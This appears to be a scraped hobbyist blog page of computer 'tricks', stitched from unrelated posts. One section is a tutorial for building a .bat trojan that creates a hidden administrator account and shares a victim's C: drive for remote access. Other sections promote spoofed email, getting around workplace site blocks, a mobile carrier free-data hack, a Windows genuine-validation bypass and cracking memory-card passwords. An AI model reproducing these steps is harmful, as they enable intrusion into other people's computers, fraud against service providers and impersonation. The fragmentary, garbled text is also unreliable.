FUNNY AND INTRESTING u like it

SOME COOL FLASHES:
1. PLAY THE DRUMS -U are given a set of drums,just hit them.

2. DANCE – very funny one.Just type your name when the flash loads and check out the performance.

3. FINALE  

4. KITTEN SHOOT -have a Shooting practice   

5. SINGING HORSES
6. HOLES -A very good game for passing on the time

7. CAT
8. MINIPUTT -A very good golf game.  

9. PENGUIN -Another flash game for passing the time.

10. BEATS -VERY GOOD ONE
11. ROCK BAND -Play your own rock band  

12. RAP
13. SEE IT - See what your computer Iconsdo when you are not home.
14. SMOKE KILLS -VERY GOOD ONE..I love this.
15. FIETS -Another flash game.    

16. TERROR
 

Most annoying webpage in the internet : click here
The real person behind Bush : click here
Make your own error message: click here
FOR all those who love the game SCRIBBLER: click here
A small challenge for all your senses.just check it out once: click here
For all those of you who are interested in knowing about your past life: click here
wanna write a letter with blood and send it to someone?? : click here
Check your hand to eye co ordination : click here
ringtones only kids can hear : click here
A very good creative clock : click here
Check Your Age On Other PLanets :click here
A complete test of your IQ(intelligent quotient):click here
Another of these insane(but nice) tests! If So you died (it’s okay, it happens). This survey will tell you approximately how much your body would sell for : click here
See this crazy website that pays you to sell your “soul” to them : click here
Know about ur personality based on a simple drawing test : click here

SEND FAKE MAILS

hey guys ever thought of sending fake mails or anonymous mails to your friends??Sounds crazy??
But its really possible.There are few websites in the internet which will allow you to send fake and anonymous mails keeping your identity a secret.Using these websites you can send a mail from any address to any address.A very good option to play a prank with your frenz and even your foes(just for educational and fun purpose).This service is perfect for the following
  • catch a cheating spouse husband or wife.
  • find out if your friend is are real friend
  • give warnings to people
  • inform the police about illegal activities
  • inform the tax office about tax cheaters
  • confess your love to somebody
  • play an email joke with your friends
  • when your own email service doesn’t work
  • if your private email is banned by the recipient
  • report fraud to your boss or institution
  • and many more reasons…
Here are few websites which will allow you to do
it….
1.send fake mail
2.send fake mail
3.send fake mail
4.send fake mail
5.send fake mail
6.send fake mail
7.send fake mail
8.send fake mail

Recover deleted files from hard drive

Have you accidentally deleted an important file?.Then you need not to worry even if you have deleted the file from recycle bin.If you realize that you have accidentally deleted a file from hard drive then you must act immediately to recover it.In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.





If you search for "data recovery service" or "data recovery software" you will come across hundreds of softwares claiming to recover deleted files but they don't.Their purpose is just to take your money.These data recovery software's are either neither effective nor capable of recovering your files in its original condition.I have tested lots of data recovery softwares and found the following software as the best data recovery software.

1. Stellar Phoenix Data Recovery (for Windows)

2. Stellar Phoenix Mac Data Recovery (for Mac)

What is Stellar Phoenix?

Stellar Phoenix Windows Data Recovery Software is a comprehensive windows partition recovery solution for data loss due to partition corruption, partition resizing, file system damage, boot sector corruption, MBR damage, virus infection and human errors.

Will I be able to recover the files back?
Since the operating system doesn’t immediately re-use the space from the deleted files, it is most certainly possible to recover the deleted files back in 100% original condition.


How to recover lost files with Stellar phoenix data recovery software?

Files & folders are also deleted using Shift+Delete key. By using Shift+Delete key, files are deleted permanently and its contents will not be stored in the recycle bin. An ordinary computer user will assume that using Shift+Delete key will permanently delete a file from the system. If the data which has got deleted is important then it becomes very essential to recover that data as quickly as possible. It needs to be recovered using data recovery software to locate, recover and restore all the important files and folders.

Stellar Phoenix Windows Data Recovery Software is an ideal solution to all your Windows related data loss problems. This software is an advanced recovery software designed for safe and non-destructive data recovery from hard drive or any other removable storage media. It also supports recovery of raw data from badly corrupted storage media. Additionally, it also offers data recovery from formatted drives.

Features:

With Stellar phoenix data recovery software you can:

1.Recover FAT16, FAT32, VFAT, NTFS, and NTFS5 file system partitions
2.Recover deleted emails
3.Recover deleted documents
4.Recover deleted photos
5.Recover deleted music
6.Formatted Hard-Drive recovery
7.Recover files from USB Drives, CDs, DVDs and memory cards
8.Recover almost all the camera format files

and much more.

How to Create a trojan in .bat file?

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously  posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer

Creating a Trojan in a .bat file - Procdure

1.Go to start and click on run and type cmd

2.Now insert this command: net

And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.

Open notepad and write there:
    
                dir
                pause                                         

And now save this as test.bat and execute it.

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know which version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access. 


Hope you  liked the post! Pass the comments

creat VIRUS Batch Files ?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'








folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat



Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.






Cool Trick – SHOW YOUR PC DUAL CORE,CORE2DUAL, i3 ,i5 ,i7 OR MORE















GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL


PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON

MODIFY AND WRITE WHAT EVER YOU WANT OR NAME IT CORE i3 ,i5 ,i7 OR MORE




Convert FAT into NTFS


To convert a FAT partition to NTFS, perform the following steps.
This tutorial will show you how to convert FAT or FAT32 Volume to NTFS Format.
Please Note:
Backup your any important data before doing this we highly recommend to do so because
there is a chance to corruption or data loss during the conversion is minimal, So we recommend that you perform a backup of the data on the volume that you want to convert before you start the conversion.

 

Now I’m going to show you how to convert Fat , Fat32 to NTFS format by 5 steps:
  • First Click “Start” , Then “All Programs”, “Accessories”, and then click “Command Prompt”.
  • At the command prompt, type the following, drive letter is the drive that you want to convert:
convert drive letter: /fs:ntfs
Ex: convert d:/fs:ntfs
If the operating system is on the drive that you are converting, you will be prompted to schedule the task when you restart the computer because the conversion cannot be completed while the operating system is running. When you are prompted, click “YES”.
  • When you receive the following message at the command prompt, type the volume label of the drive that you are converting, and then press ENTER:
The type of the file system is FAT.
Enter the current volume label for drive drive letter
  • When the conversion to NTFS is complete, you receive the following message at the command prompt:
Conversion complete!!

How to Delete undeletable Files and Folders ?????

Due to a hardware failure or a sudden cut in power supply, you may find certain files are not deletable. Windows will display a warning message such as “Cannot delete file: Access is denied. These redundant files cannot me moves, renamed or delete. Not only it is annoying, it is a waste of disk space if these files are large. Do you ever encounter problem like this before? If you had like this experience then here’s are some solutions for you. There are many ways to delete undeletable files and folders in your system. But in here I’ll show you the most easiest ways to do this. So lest Start with the first method.  if you can’t continue with this or if this isn’t work you can try other methods .

Method #1
  1. Right-click onthe file you want to delete and choose properties, make a note of the file location. Usually this is something similar to c:\windows\system32\undeleteablefilesname.exe
  2. Click on Start, Run, and type CMD and Press Enter to open a Command Prompt window.
  3. Leave the Command Prompt window open, but proceed to close all other open programs
  4. Click on Start, Run and type TASKMGR.EXE and press Enter to start Task Manager
  5. Click on the Processes tab, click on the process named Explorer.exe and click on End Process.
  6. Minimize Task Manager but leave it open
  7. Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command. for example to change to the Windows\System32 directory you would enter cd \windows\system32 and Press Enter.
  8. Now use the DEL command to delete the offending file. Type DEL <filename> where <filename> is the file you wish to delete. for Example: del undeletable.exe
  9. Use ALT-TAB to go back to Task Manager.
  10. In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.
  11. Close Task Manager
Method #2
  1. First create a text file using Notepad.
  2. Rename it with your undeletable file name extension. for example suppose that you want to delete file with .EXE extension. So you need to change your notepad name to filename.EXE.
  3. Now open it using notepad (open with option in your right click menu)
  4. Click ‘File’ >> ‘ Save As’ and locate the folder where your undeletable file is (Choose All files from the file type box)
  5. click on the file you want to delete.
  6. It should ask u to overwrite the existing file, choose yes and you can delete it as normal.
Method #3
Delete undeletable Files and Folders Using Software.
Try UnlockMe, it is a free software with the ability to delete any files that cannot be deleted by Windows. Once installed, simply right click on the file and select ‘Unlock Me’, this enable Windows to remove the un-deletable files from your computer on your next attempt. Download UnlockMe Now, it is free!



find XP key From window cd









Just explore the CD itself by going to My Computer than right clicking the CD and click Explore.
  •  Now just find and open the folder named i386
  •  Find the .TXT file in it named UNATTEND.TXT well it will look like simple Unattend no problem just open it with Notepad.
  •  Scroll it till the last line appears Voila !!! you have the Product Key written right in front of you. Done!

How Access Block Website

Learn how to access Block Website in college or office


All people must know to blok social website in colleges or office social network sites like Friendster, Facebook, Myspace, Bebo, Hi5, Orkut, etc? are blocked by the Admin. U have not able to acess this site with admin permission.


1)Using IP Instead of URL
This depends on the software/application used. Sometimes blocked sites are stored as a list of URLs (eg. www.yahoo.com, www.gmail.com,etc) and typing the IP instead of the URL might sometimes work. In a local computer, doing a ping domain.com (ping www.facebook.com) command in Command Prompt (Mac users use Terminal) will return you the IP address. You can also find ip of wbsite online visit this site www.whatsmyip.org

2)Redirection with Short URL service
Sometimes the URL you intend to browse might be ban, but converting them to another a shorter URL with short URL services might just help you to bypass the settings.
Here’s 2 Short URL service we’ve previously mentioned – MooURL, SnipURL.

3)Google Cache
Search engines like Google and Yahoo cache webpages and these cached pages are stored in search engines themselves, which likely will be added to the blocked list. Click on the ‘cache’ will bring you to a cache version of the page, as updated as how Google caches it.

4)Internet Archive – Wayback Machine
Wayback Machine is a internet service that periodically keeps a copy of almost all websites in the Internet way from the date they’re started. Clicking on the latest copy of what Wayback Machine have should be somewhat similar to the real site. Another way to access blocked sites via caches.

5)Anonymous Surfing
Some site provide you to take advantage of their proxy or domain to surf other sites as anonymous. Here’s some proxy websites
# http://www.hidemyass.com
# http://www.anonymizer.com
# http://www.wujie.net
# http://www.ultrareach.net
# http://surfshield.net
# http://www.guardster.com/subscription/proxy_free.php
# http://anonymouse.ws/anonwww.html
# http://www.browser-x.com
# http://www.spysurfing.com
# http://www.xerohour.org/hideme
# http://www.proxyz.be

6)Use Proxy in Browsers (Vpn also used that)
There are many of sites out there that distributes free proxies of almost any country. Here’s an example. Check out the following methods on how/where to insert proxies in your web browsers.how to implement blow apply this setting.
Proxy Surfing – Firefox
Under Advanced tab, select Network tab, then click inside Connection Settings. Select Manual proxy configuration, put proxy under HTTP proxy.
Proxy Surfing – Internet Explorer
Go to Tools -> Internet Options. Select Connections tab. Click into LAN Settings, check Proxy Server. Insert your proxy URL inside Address.

7)Bypass with Translations services
Online translation services like AltaVista BabelFish, Google Translate allows you to translate a website from one language to another and display the translated results on their own page.The trick here is to enter the URL (website you’re blocked), retranslate it even if you don’t need to and let Google or AltaVista fetch you the content.

8)Subscribe to RSS Feed
This might not work for all sites, but if the site you intended to visit provides RSS feeds, you can subscribe and read it with a RSS reader, or have it regularly send the contents to your email.

9)Retrieve web pages via Email
Web2Mail is a free service that sends websites you want to read right into your inbox. All you need to do is send an email to www@web2mail.com with the URL as subject title.





Learn How To Enable Right Click on Website.



You know the some website does not give the permissin to Right click. you can  press right click on that websites either like you show get to prompt with some message or nothing will happen. Pls read carefully I give tutorial how to bupassthat show in blow.
I will tell you the best and the most simple trick.You don’t require any software or addon for this trick.Website that block the right click do it using a javascript code.If you block javascript code in your browser then your right click cannot be blocked.

If you are Using Internet Explorer Browser
  1. Goto Tools>Internet options>Security
  2. Now Click on Custom Level
  3. Now find Scripting Section it will be around the end.
  4. Now disable Active Scripting.This will disable JavaScript and vbscript in your browser.
  5. Click on OK.
  6. Now restart your browser
If you are Using Mozilla Firefox Browser
  1. Goto Tools>Options>Content
  2. Uncheck the box Enable JavaScript
  3. Click Ok
  4. Open the website that have blocked your right click.
If you are Using Google Chrome Browser
  1. Click on the Wrench Icon on the top right side on your browser.
  2. Click on Options
  3. Now goto Under the Hood tab
  4. Click on Content Setings and then on JavaScript
  5. Disable java script and open the website.

Reset Your Mobile Memory Card

Reset Your Mobile Memory Card Password 2 minutes
 
We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.


In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device

Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

BSNL 3G Hack!

BSNL 3G Hack! Browse Internet at 120 Kbps For Free
Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.

Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.

Just follow up the instruction:




  1. Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
  2. Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
  3. Now recharge again with Rs 1 to convert in to 2G SIM
  4. Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM 
  5. Now again recharge with Rs 1 to convert in to 3G SIM 
  6. Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 1250000 MB free usage.
Hope it will work for you! Try it and share you thought with us!

Rename Your Recycle Bin

AWESOME TRICK

Hey Guys just follow thse simple steps and change the name of your Recycle Bin(where temporarely deleted files are stored)
1)Goto 'start' menu and Choose 'Run' command.
2)Type 'regedit' (without inverted commas). U will see Registery Editor Window on Ur Screen. 3)Now, On the Left Hand Side of the Window you'll see a Tree of folders Just DoubleClick on the HKEY_CURRENT_USER folder>Now in the new folder Tree DoubleClick on the 'Software' folder > then DoubleClick on 'Microsoft' folder>'Windows' folder>'Current Version' folder>'Explorer' folder>'CLSID' folder.
4)Now, You will see a Tree of 3 or 4 folder(don't worry about the no. of folders). Just Click on the folder : '{645FF040-5081-101B-9F08-00AA002F954E}'.
5)Finally, after Clicking on '{645FF040-5081-101B-9F08-00AA002F954E}' folder Goto the Right Hand Side of the Same window and
Double Click On the Default Option and Write in the name You want for Your Recycle Bin e.g. :- Trash #. CLick O.K. button. Goto Your Desktop and Refresh the Desktop and See the magic. Your Recycle Bin has been Renamed
AND YOUR FRIEND SURPRISE

AWESOME NOTEPAD SYMBOLS

 NOTEPAD TRICKS

Alt+15= ¤ Alt+79= O Alt+129= ü Alt+179= ¦ Alt+229= Õ Alt+20= ¶ Alt+80= P Alt+130= é Alt+180= ¦ Alt+230= µ Alt+21= § Alt+81= Q Alt+131= â Alt+181= Á Alt+231= þ Alt+32=espaço Alt+82= R Alt+132= ä Alt+182= Â Alt+232= Þ Alt+33= ! Alt+83= S Alt+133= à Alt+183= À Alt+233= Ú Alt+34=" Alt+84= T Alt+134= å Alt+184= © Alt+234= Û Alt+35= # Alt+85= U Alt+135= ç Alt+185= ¦ Alt+235= Ù Alt+36= $ Alt+86= V Alt+136= ê Alt+186= ¦ Alt+236= ý Alt+37= % Alt+87= W Alt+137= ë Alt+187= + Alt+237= Ý Alt+38= & Alt+88= X Alt+138= è Alt+188= + Alt+238= ¯ Alt+39= ' Alt+89= Y Alt+139= ï Alt+189= ¢ Alt+239= ´ Alt+40= ( Alt+90= Z Alt+140= î Alt+190= ¥ Alt+240= ­ Alt+41= ) Alt+91= [ Alt+141= ì Alt+191= + Alt+241= ± Alt+42= * Alt+92= Alt+142= Ä Alt+192= + Alt+242= _ Alt+43= + Alt+93= ] Alt+143= Å Alt+193= - Alt+243= ¾ Alt+44= , Alt+94= ^ Alt+144= É Alt+194= - Alt+244= ¶ Alt+45= - Alt+95= _ Alt+145= æ Alt+195= + Alt+245= § Alt+46= . Alt+96= ` Alt+146= Æ Alt+196= - Alt+246= ÷ Alt+47= / Alt+97= a Alt+147= ô Alt+197= + Alt+247= ¸ Alt+48= 0 Alt+98= b Alt+148= ö Alt+198= ã Alt+248= ° Alt+49= 1 Alt+99= c Alt+149= ò Alt+199= Ã Alt+249= ¨ Alt+50= 2 Alt+100= d Alt+150= û Alt+200= + Alt+250= · Alt+51= 3 Alt+101= e Alt+151= ù Alt+201= + Alt+251= ¹ Alt+52= 4 Alt+102= f Alt+152= ÿ Alt+202= - Alt+252= ³ Alt+53= 5 Alt+103= g Alt+153= Ö Alt+203= - Alt+253= ² Alt+54= 6 Alt+104= h Alt+154= Ü Alt+204= ¦ Alt+254= _ Alt+55= 7 Alt+105= i Alt+155= ø Alt+205= - Alt+56= 8 Alt+106= j Alt+156= £ Alt+206= + Alt+57= 9 Alt+107= k Alt+157= Ø Alt+207= ¤ Alt+58= : Alt+108= l Alt+158= × Alt+208= ð Alt+59= ; Alt+109= m Alt+159= ƒ Alt+209= Ð Alt+60= < 110=" n" 160=" á" 210=" +" 61=" =" 111=" o" 161=" í" 211=" Ë" 62=" "> Alt+112= p Alt+162= ó Alt+212= È Alt+63= ? Alt+113= q Alt+163= ú Alt+213= i Alt+64= @ Alt+114= r Alt+164= ñ Alt+214= Í Alt+65= A Alt+115= s Alt+165= Ñ Alt+215= Î Alt+66= B Alt+116= t Alt+166= ª Alt+216= Ï Alt+67= C Alt+117= u Alt+167= º
♀& #9792 widout spaces♂& #9794 widout spaces◘& #9688 widout spaces•& #8266 widout spaces♠& #9824 widout spaces♣& #9827 widout spaces Δ & #916 widout spacesΘ & #920 widout spacesΞ & #926 widout spacesΠ & #928 widout spacesΣ & #931 widout spacesΦ& #934 widout spacesΨ& #936 widout spacesΩ& #937 widout spacesα& #945 widout spacesβ& #946 widout spacesγ& #947 widout spacesδ& #948 widout spacesε& #949 widout spacesζ& #950 widout spacesη& #951 widout spacesθ& #952 widout spacesι& #953 widout spacesκ& #954 widout spacesλ& #955 widout spacesμ& #956 widout spacesξ& #958 widout spacesς
& #962 widout spacesσ & #963 widout spacesτ & #964 widout spacesψ
& #968 widout spacesω & #969 widout spacesθ & #977 widout spaces & #9829 ♥
alt+987=█ alt+6=♠

FOLLOWE US FOR NEW TRICKS

Make your wndows Xp GENUINE.!!

Read this you able to make your window GENUINE

This will allow you to bypass the Microsoft Genuine Validation thingythis method works better than many others i've tried before.
forget the cracks and injectors etc... this is the BEST WAY:

1) start > run > "regedit" (without the quotes of course)

2) go to the key:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer...and doubleclick on it.
Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!now close out regedit.

Hide All Hard Drives In Window xp

MATTER OF INTERESTE


Hello folks!

Here's a funny tutorial. Recently, I have written a small code in VB script to hide all the drives on XP machine. This is not a Virus or Trojan, so you don't worry about it……This is just a funny code.
The code is shown below:

dim fso, wscr, v, r
set wscr = CreateObject("WScript.shell")

Watch Live Tv Here